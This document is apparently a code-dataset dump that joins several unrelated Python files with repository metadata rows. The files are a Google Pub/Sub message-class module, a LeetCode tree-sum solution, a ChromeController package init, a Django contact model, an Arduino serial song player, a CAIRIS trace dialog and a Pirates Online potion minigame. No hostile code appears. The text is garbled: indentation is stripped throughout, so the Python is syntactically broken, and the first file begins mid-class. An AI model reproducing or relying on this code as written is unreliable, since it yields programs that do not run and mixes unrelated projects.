r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class Subscription(_messages.Message):
r"""A subscription resource.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
ackDeadlineSeconds: The approximate amount of time (on a best-effort
basis) Pub/Sub waits for the subscriber to acknowledge receipt before
resending the message. In the interval after the message is delivered
and before it is acknowledged, it is considered to be
<i>outstanding</i>. During that time period, the message will not be
redelivered (on a best-effort basis). For pull subscriptions, this
value is used as the initial value for the ack deadline. To override
this value for a given message, call `ModifyAckDeadline` with the
corresponding `ack_id` if using non-streaming pull or send the `ack_id`
in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The
minimum custom deadline you can specify is 10 seconds. The maximum
custom deadline you can specify is 600 seconds (10 minutes). If this
parameter is 0, a default value of 10 seconds is used. For push
delivery, this value is also used to set the request timeout for the
call to the push endpoint. If the subscriber never acknowledges the
message, the Pub/Sub system will eventually redeliver the message.
expirationPolicy: A policy that specifies the conditions for this
subscription's expiration. A subscription is considered active as long
as any connected subscriber is successfully consuming messages from the
subscription or is issuing operations on the subscription. If
`expiration_policy` is not set, a *default policy* with `ttl` of 31 days
will be used. The minimum allowed value for `expiration_policy.ttl` is 1
day. <b>BETA:</b> This feature is part of a beta release. This API might
be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
messageRetentionDuration: How long to retain unacknowledged messages in
the subscription's backlog, from the moment a message is published. If
`retain_acked_messages` is true, then this also configures the retention
of acknowledged messages, and thus configures how far back in time a
`Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or
less than 10 minutes.
name: The name of the subscription. It must have the format
`"projects/{project}/subscriptions/{subscription}"`. `{subscription}`
must start with a letter, and contain only letters (`[A-Za-z]`), numbers
(`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`),
plus (`+`) or percent signs (`%`). It must be between 3 and 255
characters in length, and it must not start with `"goog"`.
pushConfig: If push delivery is used with this subscription, this field is
used to configure it. An empty `pushConfig` signifies that the
subscriber will pull and ack messages using API methods.
retainAckedMessages: Indicates whether to retain acknowledged messages. If
true, then messages are not expunged from the subscription's backlog,
even if they are acknowledged, until they fall out of the
`message_retention_duration` window. This must be true if you would like
to <a href="https://cloud.google.com/pubsub/docs/replay-
overview#seek_to_a_time"> Seek to a timestamp</a>.
topic: The name of the topic from which this subscription is receiving
messages. Format is `projects/{project}/topics/{topic}`. The value of
this field will be `_deleted-topic_` if the topic has been deleted.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
ackDeadlineSeconds = _messages.IntegerField(1, variant=_messages.Variant.INT32)
expirationPolicy = _messages.MessageField('ExpirationPolicy', 2)
labels = _messages.MessageField('LabelsValue', 3)
messageRetentionDuration = _messages.StringField(4)
name = _messages.StringField(5)
pushConfig = _messages.MessageField('PushConfig', 6)
retainAckedMessages = _messages.BooleanField(7)
topic = _messages.StringField(8)
class TestIamPermissionsRequest(_messages.Message):
r"""Request message for `TestIamPermissions` method.
Fields:
permissions: The set of permissions to check for the `resource`.
Permissions with wildcards (such as '*' or 'storage.*') are not allowed.
For more information see [IAM
Overview](https://cloud.google.com/iam/docs/overview#permissions).
"""
permissions = _messages.StringField(1, repeated=True)
class TestIamPermissionsResponse(_messages.Message):
r"""Response message for `TestIamPermissions` method.
Fields:
permissions: A subset of `TestPermissionsRequest.permissions` that the
caller is allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class Topic(_messages.Message):
r"""A topic resource.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
kmsKeyName: The resource name of the Cloud KMS CryptoKey to be used to
protect access to messages published on this topic. The expected format
is `projects/*/locations/*/keyRings/*/cryptoKeys/*`.
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
messageStoragePolicy: Policy constraining how messages published to the
topic may be stored. It is determined when the topic is created based on
the policy configured at the project level. It must not be set by the
caller in the request to CreateTopic or to UpdateTopic. This field will
be populated in the responses for GetTopic, CreateTopic, and
UpdateTopic: if not present in the response, then no constraints are in
effect.
name: The name of the topic. It must have the format
`"projects/{project}/topics/{topic}"`. `{topic}` must start with a
letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes
(`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or
percent signs (`%`). It must be between 3 and 255 characters in length,
and it must not start with `"goog"`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
kmsKeyName = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
messageStoragePolicy = _messages.MessageField('MessageStoragePolicy', 3)
name = _messages.StringField(4)
class UpdateSnapshotRequest(_messages.Message):
r"""Request for the UpdateSnapshot method.
Fields:
snapshot: The updated snapshot object.
updateMask: Indicates which fields in the provided snapshot to update.
Must be specified and non-empty.
"""
snapshot = _messages.MessageField('Snapshot', 1)
updateMask = _messages.StringField(2)
class UpdateSubscriptionRequest(_messages.Message):
r"""Request for the UpdateSubscription method.
Fields:
subscription: The updated subscription object.
updateMask: Indicates which fields in the provided subscription to update.
Must be specified and non-empty.
"""
subscription = _messages.MessageField('Subscription', 1)
updateMask = _messages.StringField(2)
class UpdateTopicRequest(_messages.Message):
r"""Request for the UpdateTopic method.
Fields:
topic: The updated topic object.
updateMask: Indicates which fields in the provided topic to update. Must
be specified and non-empty. Note that if `update_mask` contains
"message_storage_policy" then the new value will be determined based on
the policy configured at the project or organization level. The
`message_storage_policy` must not be set in the `topic` provided above.
"""
topic = _messages.MessageField('Topic', 1)
updateMask = _messages.StringField(2)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"[email protected]"
] | |
12715c528873546ae9649b4dbb52876cf6d0505b | f90522eee8d87c1486f32f3801a67141f7aee15f | /0129.Sum Root to Leaf Numbers/solution.py | a5789c653314b4d53aacfa3e2860b7adcd4c6bbb | [
"Apache-2.0"
] | permissive | zhlinh/leetcode | 15a30af8439e664d2a5f1aa328baf96f0f1791da | 6dfa0a4df9ec07b2c746a13c8257780880ea04af | refs/heads/master | 2021-01-15T15:49:25.525816 | 2016-09-20T03:24:10 | 2016-09-20T03:24:10 | 48,949,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: [email protected]
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a binary tree containing digits from 0-9 only,
each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3
which represents the number 123.
Find the total sum of all root-to-leaf numbers.
For example,
1
/ \
2 3
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Return the sum = 12 + 13 = 25.
'''
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
totalSum = 0
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
self.helper(root, 0)
return self.totalSum
def helper(self, root, num):
num = num * 10 + root.val
if not root.left and not root.right:
self.totalSum += num
return
if root.left:
self.helper(root.left, num)
if root.right:
self.helper(root.right, num)
| [
"[email protected]"
] | |
3b6849ee78281ae2e1737249fd55941971b110fc | 7ab4cdf01de10faa0b5e6103cb98f4a1447b38e1 | /ChromeController/__init__.py | 29f415a8675ecb9d895139a843ac001249a70336 | [
"BSD-3-Clause"
] | permissive | acskurucz/ChromeController | 619a0d46db60809bbe1188dc1d7230e3ef2dba47 | 4294c1ca7db9569a976710c7c219069eb07d28bf | refs/heads/master | 2020-12-08T16:40:32.528694 | 2020-01-10T12:36:28 | 2020-01-10T12:36:28 | 233,036,106 | 0 | 0 | BSD-3-Clause | 2020-01-10T11:47:56 | 2020-01-10T11:47:55 | null | UTF-8 | Python | false | false | 687 | py |
from .tab_pool import TabPooledChromium
from .chrome_context import ChromeContext
from .transport import ChromeExecutionManager
from .manager import ChromeRemoteDebugInterface
from .Generator import gen
from .cr_exceptions import ChromeControllerException
from .cr_exceptions import ChromeStartupException
from .cr_exceptions import ReusedPortError
from .cr_exceptions import ChromeConnectFailure
from .cr_exceptions import ChromeCommunicationsError
from .cr_exceptions import ChromeTabNotFoundError
from .cr_exceptions import ChromeError
from .cr_exceptions import ChromeDiedError
from .cr_exceptions import ChromeNavigateTimedOut
from .cr_exceptions import ChromeResponseNotReceived | [
"[email protected]"
] | |
9bd4b64ebb38e2e59820dd722970e0e96371a90f | 54c22fdcb44c42b1c0855be576e934939a2a2c5c | /contragents/models.py | 0b10a0036da5a0300652633c3a2677971c2eb556 | [] | no_license | flashboyka/build_yard | 84e50600e03c0124f1fdf3991491852f5f469774 | c25b419f445bc5c751966850f3860cf19dfd33a1 | refs/heads/master | 2020-12-11T06:43:44.601335 | 2020-01-15T14:34:37 | 2020-01-15T14:34:37 | 233,791,548 | 0 | 0 | null | 2020-01-14T08:19:53 | 2020-01-14T08:19:52 | null | UTF-8 | Python | false | false | 716 | py | from django.db import models
class Contragent(models.Model):
last_name = models.CharField(max_length=25, verbose_name='Фамилия')
first_name = models.CharField(max_length=25, verbose_name='Имя')
middle_name = models.CharField(max_length=25, verbose_name='Отчество')
email = models.EmailField(verbose_name='Почта')
phone = models.CharField(max_length=13, verbose_name='Номер телефона')
address = models.TextField(verbose_name='Адрес')
def __str__(self):
return f'{self.last_name} {self.first_name} {self.middle_name}'
class Meta:
verbose_name = 'Контрагента'
verbose_name_plural = 'Контрагенты'
| [
"[email protected]"
] | |
9dff0431f838a1a504fe9b24ea59c733529ae5fa | 25d6371928dc91e2593edf04d7428f4cf886da42 | /students/wzh/pyfile/playmusic.py | 3cec9f688f00be432a2e29637a297462a40713ab | [] | no_license | ophwsjtu18/ohw | 7d4ecca6fc98cadbabd3c088c0d69efa3d20a10f | 67677baad6d0b92d3d453309b66ed274c097dfd6 | refs/heads/master | 2021-05-25T10:28:59.872340 | 2018-12-19T13:18:34 | 2018-12-19T13:18:34 | 127,097,829 | 1 | 3 | null | 2018-11-07T10:53:03 | 2018-03-28T06:58:57 | Python | UTF-8 | Python | false | false | 929 | py | import serial
import serial.tools.list_ports
import time
import csv
print ('hello')
ports = list(serial.tools.list_ports.comports())
print (ports)
f=open("song.csv",'r')
songs=list(csv.reader(f))
song_dictionary={}
i=0
for song in songs:
song_dictionary[song[0]]=song[1:]
i+=1
for p in ports:
print (p[1])
if "SERIAL" in p[1] or "UART" in p[1]:
ser=serial.Serial(port=p[0])
else :
print ("No Arduino Device was found connected to the computer")
#ser=serial.Serial(port='COM4')
#ser=serial.Serial(port='/dev/ttymodem542')
#wait 2 seconds for arduino board restart
time.sleep(2)
def run():
action = "empty"
while action != "q":
print ('q for quit,others for command')
name=input()
for voice in song_dictionary[name]:
ser.write(voice.encode())
ser.write("a".encode())
time.sleep(0.1)
run()
| [
"[email protected]"
] | |
7fff60cccdbfed5de914c812bb9d37476fabd96d | 4ed038a638725ac77731b0b97ddd61aa37dd8d89 | /cairis/gui/TraceDialog.py | 93dfa69fbf3f7c968e04ca274567b4895b3f5e8f | [
"Apache-2.0"
] | permissive | RachelLar/cairis_update | 0b784101c4aff81ff0390328eb615e335301daa2 | 0b1d6d17ce49bc74887d1684e28c53c1b06e2fa2 | refs/heads/master | 2021-01-19T06:25:47.644993 | 2016-07-11T20:48:11 | 2016-07-11T20:48:11 | 63,103,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,041 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
import cairis.core.TraceParameters
import cairis.core.UpdateTraceParameters
import TracePanel
class TraceDialog(wx.Dialog):
def __init__(self,parent,parameters):
wx.Dialog.__init__(self,parent,parameters.id(),parameters.label(),style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(400,275))
if (parameters.__class__.__name__ == 'TraceDialogParameters'):
self.theOriginalFromObject = parameters.fromObject()
self.theOriginalFromId = parameters.fromId()
self.theOriginalToObject = parameters.toObject()
self.theOriginalToId = parameters.toId()
else:
self.theOriginalFromObject = -1
self.theOriginalFromId = -1
self.theOriginalToObject = -1
self.theOriginalToId = -1
self.theFromObject = -1
self.theFromId = -1
self.theToObject = -1
self.theToId = -1
self.panel = 0
self.buildControls(parameters)
self.theCommitVerb = 'Add'
def buildControls(self,parameters):
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.panel = TracePanel.TracePanel(self)
self.panel.buildControls(parameters.createFlag())
mainSizer.Add(self.panel,1,wx.EXPAND)
self.SetSizer(mainSizer)
wx.EVT_BUTTON(self,TRACE_BUTTONCOMMIT_ID,self.onCommit)
def load(self,threat):
self.panel.loadControls(threat)
self.theCommitVerb = 'Edit'
def onCommit(self,evt):
self.theFromObject = self.panel.theFromObject
self.theFromId = self.panel.theFromId
self.theToObject = self.panel.theToObject
self.theToId = self.panel.theToId
self.theFromName = self.panel.theFromName
self.theToName = self.panel.theToName
self.EndModal(TRACE_BUTTONCOMMIT_ID)
def parameters(self):
parameters = 0
if (self.theOriginalFromObject == -1):
parameters = TraceParameters.TraceParameters(self.theFromObject,self.theFromId,self.theToObject,self.theToId,self.theFromName,self.theToName)
else:
parameters = UpdateTraceParameters.UpdateTraceParameters(self.theFromObject,self.theFromId,self.theToObject,self.theToId,self.theFromName,self.theToName,self.theOriginalFromId,self.theOriginalToId)
parameters.setId(-1)
return parameters
| [
"[email protected]"
] | |
674c9caf989517d884df5cd86a772c7b2a442b8f | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /PORMain/pirates/minigame/PotionGame.py | 92f957bb8a84e1eba8affaa25371084e8a01f38f | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 20,463 | py | from panda3d.core import CardMaker, NodePath, TextNode
# File: P (Python 2.4)
from direct.interval.IntervalGlobal import Sequence, Func
from direct.showbase.ShowBaseGlobal import *
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pirates.piratesgui.GuiPanel import *
from direct.showbase import DirectObject
from direct.task import Task
from PotionGameFSM import PotionGameFSM
from PotionRecipePicker import PotionRecipePicker
from PotionRecipe import PotionRecipe
from PotionResults import PotionResults
from PotionFail import PotionFail
from PotionBoardPiece import PotionBoardPiece
from PotionGameBoard import PotionGameBoard
from PotionHint import PotionHint
from PotionInfo import PotionInfo
import PotionGlobals
import PotionRecipeData
from pirates.piratesgui import GuiButton
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import PiratesConfirm
from pirates.piratesgui import ReputationMeter
from pirates.piratesgui import GuiManager
from pirates.piratesbase import PLocalizer
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
from pirates.uberdog.UberDogGlobals import InventoryType, InventoryCategory
import math
class PotionGame(DirectObject.DirectObject):
def __init__(self, dist):
self.dist = dist
self.askToExit = False
self.askToReturn = False
self.askForHint = False
self.askForInfo = False
self.soulMade = False
self.soulMatch = False
self.closeCurrentDialog = None
self.animationList = []
self.postAnimationList = []
self.setupScene()
self.gameFSM = PotionGameFSM(self)
self.gameFSM.request('Intro')
self.accept('clientLogout', self.destroy)
self.confirm = None
def chestOpened(self):
pass
def chestClosed(self):
pass
def setupScene(self):
base.loadingScreen.tick()
base.disableMouse()
self._initGUI()
base.loadingScreen.beginStep('setupScene', 9, 45)
base.loadingScreen.tick()
self.hintScreen = PotionHint(self)
self.hintScreen.stash()
base.loadingScreen.tick()
self.infoScreen = PotionInfo(self)
self.infoScreen.stash()
base.loadingScreen.tick()
self.currentRecipe = None
self.recipes = []
for recipeData in PotionRecipeData.PotionRecipeList:
valid = True
if recipeData.get('disabled', False):
continue
for ingredient in recipeData['ingredients']:
if ingredient['color'] not in PotionRecipeData.PotionColorSets[self.dist.colorSet]:
valid = False
continue
newRecipe = PotionRecipe(self, recipeData['potionID'], recipeData['name'], recipeData['desc'], recipeData['ingredients'], recipeData['level'], recipeData['free'], recipeData.get('questOnly', False))
if valid:
newRecipe.available = True
else:
newRecipe.available = False
self.recipes.append(newRecipe)
for recipe in self.recipes:
recipe.setPos(-1.1, 0, -0.65)
self.recipePicker = PotionRecipePicker(self)
base.loadingScreen.tick()
(self.recipePicker.setPos(0.0, 0.0, 0.0),)
self.recipePicker.setEnabled(False)
self.recipePicker.stash()
self.resultsScreen = PotionResults(self)
self.resultsScreen.stash()
base.loadingScreen.tick()
self.failScreen = PotionFail(self)
self.failScreen.stash()
base.loadingScreen.tick()
self._initIntervals()
base.loadingScreen.tick()
self.gameBoard = PotionGameBoard(self)
self.gameBoard.setPos(0.1, 0, -0.705)
base.loadingScreen.tick()
self.unlockList = []
base.musicMgr.request(SoundGlobals.MUSIC_MINIGAME_POTION, priority = 1, volume = 0.4)
base.loadingScreen.endStep('setupScene')
def resetScene(self):
self.gameBoard.resetBoard()
if self.currentRecipe is not None:
self.currentRecipe.stash()
def _initGUI(self):
base.loadingScreen.beginStep('init Gui', 4, 55)
cm = CardMaker('PotionBackground')
cm.setFrame(-10, 10, -10, 10)
cm.setColor(0, 0, 0, 1)
self.background = NodePath(cm.generate())
self.background.reparentTo(aspect2d)
self.background.setBin('background', -100)
self.xpBackground = NodePath('PotionXPBackground')
self.xpBackground.reparentTo(aspect2d)
self.xpBackground.setBin('background', -95)
base.loadingScreen.tick()
self.dialogs = NodePath('DialogBackground')
self.dialogs.reparentTo(aspect2d)
self.dialogs.setBin('background', -70)
self.buttonsBackground = NodePath('PotionButtonBackground')
self.buttonsBackground.reparentTo(base.a2dBottomRight)
self.buttonsBackground.setBin('background', -90)
textureCard = loader.loadModel('models/minigames/pir_m_gui_pot_textureCard')
self.stretchedBackgroundTextureCard = textureCard.find('**/pir_t_gui_pot_background')
self.stretchedBackgroundTextureCard.reparentTo(self.background)
self.stretchedBackgroundTextureCard.setScale(3.4, 1.0, 3.4)
self.stretchedBackgroundTextureCard.setPos(0.0, 20.0, 0.0)
fadecm = CardMaker('card')
fadecm.setFrameFullscreenQuad()
self.fadeIn = render2d.attachNewNode(fadecm.generate())
self.fadeIn.setBin('background', -50)
self.fadeIn.setPos(0.0, -30.0, 0.0)
self.fadeIn.setColor(0, 0, 0, 1.0)
self.fadeIn.setTransparency(True)
base.loadingScreen.tick()
cm = CardMaker('card')
cm.setFrame(0, 1, 0.01, 0.01)
self.foregroundLayer = aspect2d.attachNewNode(cm.generate())
self.foregroundTextureCard = textureCard.find('**/pir_t_gui_pot_foreground')
self.foregroundTextureCard.setScale(0.8, 1.0, 0.4)
self.foregroundTextureCard.setPos(-0.7, -20.0, 0.8)
self.foregroundTextureCard.setBin('background', -80)
self.foregroundTextureCard.copyTo(self.foregroundLayer)
self.repMeter = ReputationMeter.ReputationMeter(InventoryType.PotionsRep, width = 0.56)
inv = localAvatar.getInventory()
self.repMeter.reparentTo(self.xpBackground)
self.repMeter.setPos(0, 0, -0.95)
self.repMeter.update(inv.getAccumulator(InventoryType.PotionsRep))
localAvatar.guiMgr.registerReputationHandler(self.updateRepMeter)
base.loadingScreen.tick()
self.closeButton = GuiButton.GuiButton(image = (textureCard.find('**/pir_t_gui_pot_escape'), textureCard.find('**/pir_t_gui_pot_escapeOn'), textureCard.find('**/pir_t_gui_pot_escapeOn'), textureCard.find('**/pir_t_gui_pot_escape')), image_scale = (0.1, 0.1, 0.1), image_pos = (0.075, 0, 0.08), hotkeys = [
'Escape'], hotkeyLabel = PLocalizer.PotionGui['ExitButton'], pos = (-0.4, 0.0, 0.01), text0_fg = PotionGlobals.TextColor, text1_fg = PiratesGuiGlobals.TextFG0, text2_fg = PiratesGuiGlobals.TextFG15, text3_fg = PotionGlobals.TextColorDisabled, parent = self.buttonsBackground, command = self.confirmQuit)
self.returnButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe'], PLocalizer.PotionGui['SwitchRecipe']), pos = (-0.58, 0.0, -0.62), text_scale = PiratesGuiGlobals.TextScaleExtraLarge, text_shadow = None, image = (None, None, None, None), text0_fg = PotionGlobals.TextColor, text1_fg = PiratesGuiGlobals.TextFG0, text2_fg = PiratesGuiGlobals.TextFG15, text3_fg = PotionGlobals.TextColorDisabled, parent = self.background, command = self.confirmReturn)
self.returnButton.stash()
self.hintsButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial'], PLocalizer.PotionGui['ShowTutorial']), text_scale = PiratesGuiGlobals.TextScaleSmall, image_scale = (0.25, 0.1, 0.18), image_pos = (0, 0, 0), pos = (-0.53, 0.0, 0.075), parent = self.buttonsBackground, command = self.showLastHint)
self.InfoButton = GuiButton.GuiButton(text = (PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList'], PLocalizer.PotionGui['IngredientList']), text_scale = PiratesGuiGlobals.TextScaleSmall, image_scale = (0.3, 0.1, 0.18), image_pos = (0, 0, 0), pos = (-0.84, 0.0, 0.075), parent = self.buttonsBackground, command = self.showInfo)
textureCard.remove_node()
base.loadingScreen.endStep('init Gui')
def updateRepMeter(self, catagory, value):
if catagory == InventoryType.PotionsRep:
self.repMeter.update(value)
def disableButtons(self):
pass
def enableButtons(self):
pass
def confirmQuit(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
if self.closeCurrentDialog is not None:
self.closeCurrentDialog()
if self.gameFSM.gameStarted:
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['ExitTitle'], PLocalizer.PotionGui['AbortAndExitText'], self.onCloseConfirmed)
self.confirm.bNo['command'] = self.onCloseDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameBoard.disableInputEvents()
self.disableButtons()
self.gameFSM.demand('ExitRequest')
else:
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['ExitTitle'], PLocalizer.PotionGui['ExitText'], self.onCloseConfirmed)
self.confirm.bNo['command'] = self.onQuitDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameFSM.demand('ExitRequest')
self.confirm.setPos(0.35, 0, -0.17)
else:
self.askToExit = True
def confirmReturn(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
if self.closeCurrentDialog is not None:
self.closeCurrentDialog()
self.closeCurrentDialog = self.cleanUpConfirm
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['SwitchTitle'], PLocalizer.PotionGui['SwitchText'], self.onReturnConfirmed)
self.confirm.setPos(0.35, 0, -0.17)
self.confirm.bNo['command'] = self.onCloseDeclined
self.gameBoard.disableInputEvents()
self.disableButtons()
self.gameFSM.demand('SwitchRequest')
else:
self.askToReturn = True
def showLastHint(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
self.hintScreen.toggle()
else:
self.askForHint = True
def showInfo(self):
if self.gameFSM.getCurrentOrNextState() in [
'Intro',
'Exit']:
return None
if self.gameFSM.getCurrentOrNextState() not in [
'Anim']:
self.gameFSM.demand('Tutorial')
self.infoScreen.toggle()
else:
self.askForInfo = True
def cleanUpConfirm(self):
self.closeCurrentDialog = None
self.enableButtons()
if self.confirm:
self.confirm.destroy()
self.confirm = None
def onQuitDeclined(self):
self.cleanUpConfirm()
self.gameFSM.request('RecipeSelect')
def onCloseDeclined(self):
self.cleanUpConfirm()
self.gameFSM.request('Eval')
def onCloseConfirmed(self):
self.enableButtons()
self.closeCurrentDialog = None
self.gameFSM.request('Exit')
def onReturnConfirmed(self):
self.enableButtons()
self.closeCurrentDialog = None
self.gameFSM.request('Reset')
def onIntroComplete(self):
if self.hintScreen.show('RecipeList'):
self.gameFSM.request('Tutorial')
else:
self.gameFSM.request('RecipeSelect')
def _initIntervals(self):
self.introSequence = Sequence(Wait(0.1), Func(self.recipePicker.unstash), LerpColorScaleInterval(self.fadeIn, colorScale = (1, 1, 1, 0), duration = 2.0), Func(self.onIntroComplete), name = 'PotionsGame.introSequence')
self.outroSequence = Sequence(Wait(0.1), LerpColorScaleInterval(self.fadeIn, colorScale = (1, 1, 1, 1), duration = 1.5), Func(base.transitions.fadeOut, 0), Func(self.destroy), name = 'PotionsGame.outroSequence')
self.completeSequence = Sequence(Wait(0.1), Func(self.resultsScreen.show), name = 'PotionsGame.completeSequence')
self.failSequence = Sequence(Wait(0.1), Func(self.failScreen.show), name = 'PotionsGame.failSequence')
self.restartSequence = Sequence(Func(self.resetScene), Wait(0.1), Func(self.resetRecipes), Func(self.recipePicker.updateList), Func(self.recipePicker.unstash), Func(self.onIntroComplete), name = 'PotionsGame.restartSequence')
def resetRecipes(self):
self.recipePicker.setEnabled(True)
for recipe in self.recipes:
recipe.reset()
def selectRecipe(self, recipe):
if self.gameFSM.state != 'RecipeSelect':
return None
itemId = PotionGlobals.potionBuffIdToInventoryTypeId(recipe.potionID)
inv = localAvatar.getInventory()
if not inv:
return None
quantity = inv.getItemQuantity(InventoryType.ItemTypeConsumable, itemId)
limit = inv.getItemLimit(InventoryType.ItemTypeConsumable, itemId)
if quantity >= limit:
self.cleanUpConfirm()
self.confirm = PiratesConfirm.PiratesConfirm(PLocalizer.PotionGui['MaxedOutTitle'], PLocalizer.PotionGui['MaxedOutText'], self.onSelectConfirmed)
self.confirm.setPos(0.35, 0, -0.17)
self.confirm.bOk['command'] = self.onSelectConfirmed
self.confirm.bOk['extraArgs'] = [
recipe]
self.confirm.bNo['command'] = self.onSelectDeclined
self.closeCurrentDialog = self.cleanUpConfirm
self.gameBoard.disableInputEvents()
self.disableButtons()
else:
self.gameFSM.request('StartGame', recipe)
def onSelectDeclined(self):
self.cleanUpConfirm()
def onSelectConfirmed(self, recipe):
self.cleanUpConfirm()
self.enableButtons()
